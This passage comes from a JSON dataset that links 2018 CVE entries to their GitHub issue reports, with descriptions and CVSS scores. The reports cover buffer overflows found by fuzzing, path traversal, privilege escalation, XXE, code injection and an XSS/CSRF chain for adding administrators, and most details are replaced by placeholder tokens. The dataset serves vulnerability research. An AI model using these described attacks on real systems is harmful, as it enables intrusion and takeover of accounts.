  29532. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29533. "severity": "MEDIUM",
  29534. "baseScore": 5.9,
  29535. "impactScore": 3.6,
  29536. "exploitabilityScore": 2.2
  29537. },
  29538. {
  29539. "CVE_ID": "CVE-2018-20201",
  29540. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1587",
  29541. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1587",
  29542. "Repo_new": "espruino/espruino",
  29543. "Issue_Created_At": "2018-12-18T02:36:24Z",
  29544. "description": "A stack overflow bug in NUMBERTAG Hello! I am learning AFL Fuzz recently,and I found a bug in this program POC is here URLTAG Please confirm Best regards APITAG RELEASE NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG espruino test PATHTAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG cff6 at pc NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG cef0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG cff6 thread T NUMBERTAG ff8ae NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG a NUMBERTAG f in APITAG APITAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG f7 in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG ac6 in APITAG APITAG NUMBERTAG d NUMBERTAG cc in run_test PATHTAG NUMBERTAG d NUMBERTAG f2 in main PATHTAG NUMBERTAG ff8ad NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG cff6 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG e6b5 in APITAG APITAG This frame has NUMBERTAG object(s NUMBERTAG filename' APITAG NUMBERTAG b9f NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG ba NUMBERTAG f4 f4 f3 f3 f3 f NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG ba NUMBERTAG f3 f NUMBERTAG ba NUMBERTAG ba NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f2 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
  29545. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29546. "severity": "HIGH",
  29547. "baseScore": 7.8,
  29548. "impactScore": 5.9,
  29549. "exploitabilityScore": 1.8
  29550. },
  29551. {
  29552. "CVE_ID": "CVE-2018-20213",
  29553. "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/8",
  29554. "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/8",
  29555. "Repo_new": "devinsmith/libexcel",
  29556. "Issue_Created_At": "2018-12-18T07:50:20Z",
  29557. "description": "There is a buffer overflow when using APITAG Description When a long name is specified as the argument, a buffer overflow occurs. My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled (note that ASAN reports a SEGV rather than an explicit buffer-overflow, so the crash manifests as an invalid memory access) APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG b7bc bp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG sp NUMBERTAG ffc NUMBERTAG bedf NUMBERTAG T NUMBERTAG b7bb in wbook_addworksheet PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fee4afe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG wbook_addworksheet NUMBERTAG ABORTING CREDIT APITAG Weiran Labs",
  29558. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29559. "severity": "HIGH",
  29560. "baseScore": 7.5,
  29561. "impactScore": 3.6,
  29562. "exploitabilityScore": 3.9
  29563. },
  29564. {
  29565. "CVE_ID": "CVE-2018-20226",
  29566. "Issue_Url_old": "https://github.com/TheHive-Project/Cortex/issues/158",
  29567. "Issue_Url_new": "https://github.com/thehive-project/cortex/issues/158",
  29568. "Repo_new": "thehive-project/cortex",
  29569. "Issue_Created_At": "2018-12-20T10:33:43Z",
  29570. "description": "Wrong checks of role when a user is created. Request Type Bug Work Environment Corte NUMBERTAG Problem Description The role of the user being created is not correctly checked against the role of the creating user. This means that an organization admin is able to create a super admin, i.e. escalate privileges beyond their own organization. Thank you, Po Hsing Wu.",
  29571. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  29572. "severity": "HIGH",
  29573. "baseScore": 7.2,
  29574. "impactScore": 5.9,
  29575. "exploitabilityScore": 1.2
  29576. },
  29577. {
  29578. "CVE_ID": "CVE-2018-20227",
  29579. "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1210",
  29580. "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1210",
  29581. "Repo_new": "eclipse/rdf4j",
  29582. "Issue_Created_At": "2018-12-18T07:46:53Z",
  29583. "description": "zip_slip. Hi all, There is a path traversal vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as below: FILETAG When decompressing zip files, entries are not checked, resulting in overwriting arbitrary files by traversing directories using \u201c.. /\u201d",
  29584. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29585. "severity": "HIGH",
  29586. "baseScore": 7.5,
  29587. "impactScore": 3.6,
  29588. "exploitabilityScore": 3.9
  29589. },
  29590. {
  29591. "CVE_ID": "CVE-2018-20301",
  29592. "Issue_Url_old": "https://github.com/smpallen99/coherence/issues/270",
  29593. "Issue_Url_new": "https://github.com/smpallen99/coherence/issues/270",
  29594. "Repo_new": "smpallen99/coherence",
  29595. "Issue_Created_At": "2017-08-22T15:51:51Z",
  29596. "description": "Coherence Security Issues. Thanks again for taking the time to talk with me. I'm opening an issue as per our conversation: The Coherence library has APITAG Assignment\" like vulnerabilities. In particular, \"registration\" endpoints (like creating, editing, updating), allow users to update any APITAG . This means that, among other issues, users can automatically confirm their accounts by sending the APITAG parameter with their registration request. Further, the library design and documentation encourages insecure functionality by default. For example: The \"store\" demo allows registering users to add themselves as admin: FILETAG Due to these issues, I would consider officially \"retiring\" the current version of Coherence in hex.",
  29597. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  29598. "severity": "MEDIUM",
  29599. "baseScore": 6.5,
  29600. "impactScore": 3.6,
  29601. "exploitabilityScore": 2.8
  29602. },
  29603. {
  29604. "CVE_ID": "CVE-2018-20302",
  29605. "Issue_Url_old": "https://github.com/smpallen99/xain/issues/18",
  29606. "Issue_Url_new": "https://github.com/smpallen99/xain/issues/18",
  29607. "Repo_new": "smpallen99/xain",
  29608. "Issue_Created_At": "2018-08-17T14:05:12Z",
  29609. "description": "[URGENT] Security Vulnerability. Since I haven't found your email, I encrypted the following report using your public keys on APITAG If you have problems reading this message please contact me either here or via APITAG . Message Encrypted CODETAG Keys APITAG APITAG Decryption CODETAG Responsible Disclosure After the time for responsible disclosure has passed, I'll comment the password for the message here.",
  29610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29611. "severity": "MEDIUM",
  29612. "baseScore": 6.1,
  29613. "impactScore": 2.7,
  29614. "exploitabilityScore": 2.8
  29615. },
  29616. {
  29617. "CVE_ID": "CVE-2018-20303",
  29618. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5558",
  29619. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5558",
  29620. "Repo_new": "gogs/gogs",
  29621. "Issue_Created_At": "2018-12-18T01:49:02Z",
  29622. "description": "Remote Code execution or|and Denial of Service. Gogs version (or commit ref): latest NUMBERTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [X] No it's currently down I discovered a way to gain code execution (via a bypass of the authentication to gain admin access, very similar to URLTAG or to trigger a small denial of service. Can you confirm u APITAG is still the best email to send more details? Best, Louis",
  29623. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29624. "severity": "HIGH",
  29625. "baseScore": 7.5,
  29626. "impactScore": 3.6,
  29627. "exploitabilityScore": 3.9
  29628. },
  29629. {
  29630. "CVE_ID": "CVE-2018-20304",
  29631. "Issue_Url_old": "https://github.com/devinsmith/libexcel/issues/9",
  29632. "Issue_Url_new": "https://github.com/devinsmith/libexcel/issues/9",
  29633. "Repo_new": "devinsmith/libexcel",
  29634. "Issue_Created_At": "2018-12-19T10:10:13Z",
  29635. "description": "It exists a buffer overflow when use APITAG Description When specify the second parameter \uff0cit will be buffer overflow My test program FILETAG Command and argument gcc fsanitize=address ggdb o exampletest example1.c PATHTAG .c I PATHTAG Crash Information The output of exampletest with address sanitizer enabled ERRORTAG CREDIT APITAG Weiran Labs",
  29636. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29637. "severity": "MEDIUM",
  29638. "baseScore": 6.5,
  29639. "impactScore": 3.6,
  29640. "exploitabilityScore": 2.8
  29641. },
  29642. {
  29643. "CVE_ID": "CVE-2018-20318",
  29644. "Issue_Url_old": "https://github.com/Wechat-Group/weixin-java-tools/issues/889",
  29645. "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/889",
  29646. "Repo_new": "wechat-group/wxjava",
  29647. "Issue_Created_At": "2018-12-20T08:13:52Z",
  29648. "description": "XXE\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG java tools\u9879\u76ee\u5b58\u5728XXE\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a APITAG FILETAG APITAG \u6b64\u5904\u662f\u4e00\u4e2axxe\u76f2\u6ce8\uff0c\u505a\u4e2a\u7b80\u5355\u7684\u590d\u73b0 APITAG FILETAG \u65e5\u5fd7\u4fe1\u606f FILETAG \u8fd8\u671b\u53ca\u65f6\u4fee\u590d",
  29649. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29650. "severity": "CRITICAL",
  29651. "baseScore": 9.8,
  29652. "impactScore": 5.9,
  29653. "exploitabilityScore": 3.9
  29654. },
  29655. {
  29656. "CVE_ID": "CVE-2018-20325",
  29657. "Issue_Url_old": "https://github.com/danijar/definitions/issues/14",
  29658. "Issue_Url_new": "https://github.com/danijar/definitions/issues/14",
  29659. "Repo_new": "danijar/definitions",
  29660. "Issue_Created_At": "2018-12-17T09:07:26Z",
  29661. "description": "APITAG method is vulnerable. coding=utf NUMBERTAG from definitions import Parser a = APITAG PATHTAG ) PATHTAG APITAG Hi, there is a vulnerability in APITAG method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  29662. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29663. "severity": "CRITICAL",
  29664. "baseScore": 9.8,
  29665. "impactScore": 5.9,
  29666. "exploitabilityScore": 3.9
  29667. },
  29668. {
  29669. "CVE_ID": "CVE-2018-20330",
  29670. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
  29671. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/304",
  29672. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  29673. "Issue_Created_At": "2018-11-25T05:10:49Z",
  29674. "description": "integer overflow in APITAG I find the bug by code review; type of \"retval\" is int, \" stride ph \" is more than sizeof int, return type is unsigned long, cause function which call APITAG get a less value, then the function use the value as \"malloc\" argument, cause heap overflow DLLEXPORT unsigned long APITAG width, int pad, int height, int subsamp) { int retval NUMBERTAG nc, i; if (subsamp NUMBERTAG subsamp >= NUMSUBOPT) APITAG Invalid argument\"); nc = (subsamp == TJSAMP_GRAY NUMBERTAG for (i NUMBERTAG i < nc; i++) { int pw = APITAG width, subsamp); int stride = PAD(pw, pad); int ph = APITAG height, subsamp); if (pw NUMBERTAG ph NUMBERTAG return NUMBERTAG else retval += stride ph; } bailout: return retval; } \u279c build git:(master) \u2717 ./tjbench PATHTAG NUMBERTAG yuv Testing YUV planar encoding/decoding FILETAG",
  29675. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29676. "severity": "HIGH",
  29677. "baseScore": 8.8,
  29678. "impactScore": 5.9,
  29679. "exploitabilityScore": 2.8
  29680. },
  29681. {
  29682. "CVE_ID": "CVE-2018-20337",
  29683. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/192",
  29684. "Issue_Url_new": "https://github.com/libraw/libraw/issues/192",
  29685. "Repo_new": "libraw/libraw",
  29686. "Issue_Created_At": "2018-12-19T02:36:42Z",
  29687. "description": "Stack buffer overflow bug. Hello! I am learning AFL Fuzz recently,and I found a bug in this project. POC is here URLTAG Please confirm Best regards Version release NUMBERTAG Environment gcc APITAG NUMBERTAG APITAG NUMBERTAG disable shared ./raw identify POC Information APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffdcba9ac0 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG c3 bp NUMBERTAG fffdcba NUMBERTAG sp NUMBERTAG fffdcba NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG fffdcba9ac0 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG c2 in __interceptor_strncpy ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a9da2 in APITAG APITAG NUMBERTAG b5af2 in APITAG APITAG NUMBERTAG ce NUMBERTAG f in APITAG APITAG NUMBERTAG e4c7 in APITAG ) APITAG NUMBERTAG in APITAG const , long long) APITAG NUMBERTAG ERRORTAG c NUMBERTAG in main samples/raw APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG f8 in _start ( PATHTAG ERRORTAG NUMBERTAG f8) Address NUMBERTAG fffdcba9ac0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG d in APITAG int) APITAG This frame has NUMBERTAG object(s NUMBERTAG uc NUMBERTAG uc NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG len NUMBERTAG table_buf NUMBERTAG c_len NUMBERTAG table_buf NUMBERTAG e_len NUMBERTAG tag NUMBERTAG type NUMBERTAG len NUMBERTAG save NUMBERTAG c NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG table_buf NUMBERTAG c NUMBERTAG table_buf NUMBERTAG e NUMBERTAG wb NUMBERTAG wb NUMBERTAG oly_lensid NUMBERTAG words NUMBERTAG APITAG NUMBERTAG yy NUMBERTAG mm NUMBERTAG dd NUMBERTAG APITAG NUMBERTAG 
buffer NUMBERTAG buf NUMBERTAG ystr NUMBERTAG ynum' APITAG NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f4 f2 f2 f2 f NUMBERTAG f4 f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG f2 f2 f2 f NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d3a NUMBERTAG f4 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING WRLAB",
  29688. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29689. "severity": "HIGH",
  29690. "baseScore": 8.8,
  29691. "impactScore": 5.9,
  29692. "exploitabilityScore": 2.8
  29693. },
  29694. {
  29695. "CVE_ID": "CVE-2018-20348",
  29696. "Issue_Url_old": "https://github.com/libyal/libpff/issues/48",
  29697. "Issue_Url_new": "https://github.com/libyal/libpff/issues/48",
  29698. "Repo_new": "libyal/libpff",
  29699. "Issue_Created_At": "2017-10-10T02:49:53Z",
  29700. "description": "A stack overflow vulnerability in libpff_item_tree_create_node. Tested Version Latest (cloned from github) Command and argument ./pffexport APITAG Crash Information The output of pffexport with address sanitizer enabled, it seems the program falls into an infinite loop. ERRORTAG gdb and backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29701. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29702. "severity": "MEDIUM",
  29703. "baseScore": 5.5,
  29704. "impactScore": 3.6,
  29705. "exploitabilityScore": 1.8
  29706. },
  29707. {
  29708. "CVE_ID": "CVE-2018-20349",
  29709. "Issue_Url_old": "https://github.com/igraph/igraph/issues/1141",
  29710. "Issue_Url_new": "https://github.com/igraph/igraph/issues/1141",
  29711. "Repo_new": "igraph/igraph",
  29712. "Issue_Created_At": "2018-12-04T08:32:19Z",
  29713. "description": "NULL Pointer Dereference vulnerability in igraph_i_strdiff function. Test Version dev version, git clone URLTAG Test Program modify graphml.c in examples/simple directory ERRORTAG and APITAG APITAG Gdb and Backtrace CODETAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  29714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29715. "severity": "MEDIUM",
  29716. "baseScore": 6.5,
  29717. "impactScore": 3.6,
  29718. "exploitabilityScore": 2.8
  29719. },
  29720. {
  29721. "CVE_ID": "CVE-2018-20357",
  29722. "Issue_Url_old": "https://github.com/knik0/faad2/issues/28",
  29723. "Issue_Url_new": "https://github.com/knik0/faad2/issues/28",
  29724. "Repo_new": "knik0/faad2",
  29725. "Issue_Created_At": "2018-12-17T06:39:54Z",
  29726. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29727. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29728. "severity": "MEDIUM",
  29729. "baseScore": 5.5,
  29730. "impactScore": 3.6,
  29731. "exploitabilityScore": 1.8
  29732. },
  29733. {
  29734. "CVE_ID": "CVE-2018-20358",
  29735. "Issue_Url_old": "https://github.com/knik0/faad2/issues/31",
  29736. "Issue_Url_new": "https://github.com/knik0/faad2/issues/31",
  29737. "Repo_new": "knik0/faad2",
  29738. "Issue_Created_At": "2018-12-17T06:51:28Z",
  29739. "description": "Invalid memory address dereference in lt_prediction(in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function lt_prediction .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29740. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29741. "severity": "MEDIUM",
  29742. "baseScore": 5.5,
  29743. "impactScore": 3.6,
  29744. "exploitabilityScore": 1.8
  29745. },
  29746. {
  29747. "CVE_ID": "CVE-2018-20359",
  29748. "Issue_Url_old": "https://github.com/knik0/faad2/issues/29",
  29749. "Issue_Url_new": "https://github.com/knik0/faad2/issues/29",
  29750. "Repo_new": "knik0/faad2",
  29751. "Issue_Created_At": "2018-12-17T06:45:31Z",
  29752. "description": "Invalid memory address dereference in APITAG APITAG . Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29753. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29754. "severity": "MEDIUM",
  29755. "baseScore": 5.5,
  29756. "impactScore": 3.6,
  29757. "exploitabilityScore": 1.8
  29758. },
  29759. {
  29760. "CVE_ID": "CVE-2018-20360",
  29761. "Issue_Url_old": "https://github.com/knik0/faad2/issues/32",
  29762. "Issue_Url_new": "https://github.com/knik0/faad2/issues/32",
  29763. "Repo_new": "knik0/faad2",
  29764. "Issue_Created_At": "2018-12-17T06:55:49Z",
  29765. "description": "Invalid memory address dereference in sbr_process_channel (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29766. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29767. "severity": "MEDIUM",
  29768. "baseScore": 5.5,
  29769. "impactScore": 3.6,
  29770. "exploitabilityScore": 1.8
  29771. },
  29772. {
  29773. "CVE_ID": "CVE-2018-20361",
  29774. "Issue_Url_old": "https://github.com/knik0/faad2/issues/30",
  29775. "Issue_Url_new": "https://github.com/knik0/faad2/issues/30",
  29776. "Repo_new": "knik0/faad2",
  29777. "Issue_Created_At": "2018-12-17T06:49:16Z",
  29778. "description": "Invalid memory address dereference in hf_assembly (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function hf_assembly .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29779. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29780. "severity": "MEDIUM",
  29781. "baseScore": 5.5,
  29782. "impactScore": 3.6,
  29783. "exploitabilityScore": 1.8
  29784. },
  29785. {
  29786. "CVE_ID": "CVE-2018-20363",
  29787. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/193",
  29788. "Issue_Url_new": "https://github.com/libraw/libraw/issues/193",
  29789. "Repo_new": "libraw/libraw",
  29790. "Issue_Created_At": "2018-12-19T03:43:52Z",
  29791. "description": "It exists a buffer overflow when use function APITAG Description When use function APITAG will be buffer overflow My test program NUMBERTAG channels in Libraw/bin Command and argument ./configure disable shared CFLAGS=\" fsanitize=address ggdb\" CXXFLAGS=\" fsanitize=address ggdb NUMBERTAG channels PATHTAG Crash Information ERRORTAG POC File FILETAG CREDIT APITAG Weiran Labs",
  29792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29793. "severity": "MEDIUM",
  29794. "baseScore": 6.5,
  29795. "impactScore": 3.6,
  29796. "exploitabilityScore": 2.8
  29797. },
  29798. {
  29799. "CVE_ID": "CVE-2018-20364",
  29800. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/194",
  29801. "Issue_Url_new": "https://github.com/libraw/libraw/issues/194",
  29802. "Repo_new": "libraw/libraw",
  29803. "Issue_Created_At": "2018-12-21T02:55:05Z",
  29804. "description": "It exists SEGV when use function APITAG Description When use function APITAG will exist SEGV My test program postprocessing_benchmark in Libraw/bin Command and argument ./postprocessing_benchmark NUMBERTAG Crash Information ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
  29805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29806. "severity": "MEDIUM",
  29807. "baseScore": 6.5,
  29808. "impactScore": 3.6,
  29809. "exploitabilityScore": 2.8
  29810. },
  29811. {
  29812. "CVE_ID": "CVE-2018-20365",
  29813. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/195",
  29814. "Issue_Url_new": "https://github.com/libraw/libraw/issues/195",
  29815. "Repo_new": "libraw/libraw",
  29816. "Issue_Created_At": "2018-12-21T03:48:38Z",
  29817. "description": "It exists heap buffer overflow when use function APITAG Description It exists heap buffer overflow in APITAG APITAG My test program NUMBERTAG channels in Libraw/bin Command and argument NUMBERTAG channels NUMBERTAG channels_crash Crash Information The output of exampletest with address sanitizer enabled ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
  29818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29819. "severity": "MEDIUM",
  29820. "baseScore": 6.5,
  29821. "impactScore": 3.6,
  29822. "exploitabilityScore": 2.8
  29823. },
  29824. {
  29825. "CVE_ID": "CVE-2018-20367",
  29826. "Issue_Url_old": "https://github.com/wstmall/wstmart/issues/1",
  29827. "Issue_Url_new": "https://github.com/wstmall/wstmart/issues/1",
  29828. "Repo_new": "wstmall/wstmart",
  29829. "Issue_Created_At": "2018-12-22T13:06:50Z",
  29830. "description": "There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users. Shang tao software APITAG e commerce system is a based on THINKPHP framework NUMBERTAG build B2B2C electric business platform, is now open source shopping system based on THINKPHP NUMBERTAG is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, APITAG applet, six side one, six side each other, have nowadays one of the most popular level NUMBERTAG distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform. The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice. 
Official address: FILETAG NUMBERTAG stored XSS Function point: mall some commodity details commodity consultation poc: POST PATHTAG HTTP NUMBERTAG Host: xx.xx.xx.xx User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG UM_distinctid NUMBERTAG d5b NUMBERTAG b NUMBERTAG d NUMBERTAG d7d NUMBERTAG d NUMBERTAG c NUMBERTAG e7e NUMBERTAG d5b NUMBERTAG e; CNZZDATA NUMBERTAG C NUMBERTAG APITAG NUMBERTAG CSRF NUMBERTAG Function point: background management staff management login account poc: FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  29831. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29832. "severity": "MEDIUM",
  29833. "baseScore": 6.1,
  29834. "impactScore": 2.7,
  29835. "exploitabilityScore": 2.8
  29836. },
  29837. {
  29838. "CVE_ID": "CVE-2018-20407",
  29839. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/343",
  29840. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/343",
  29841. "Repo_new": "axiomatic-systems/bento4",
  29842. "Issue_Created_At": "2018-12-19T02:59:54Z",
  29843. "description": "Memory leaks in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to memory leaks in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29845. "severity": "MEDIUM",
  29846. "baseScore": 6.5,
  29847. "impactScore": 3.6,
  29848. "exploitabilityScore": 2.8
  29849. },
  29850. {
  29851. "CVE_ID": "CVE-2018-20409",
  29852. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/345",
  29853. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/345",
  29854. "Repo_new": "axiomatic-systems/bento4",
  29855. "Issue_Created_At": "2018-12-21T03:39:41Z",
  29856. "description": "Heap buffer overflow in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to heap buffer overflow failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash4.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29857. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29858. "severity": "MEDIUM",
  29859. "baseScore": 6.5,
  29860. "impactScore": 3.6,
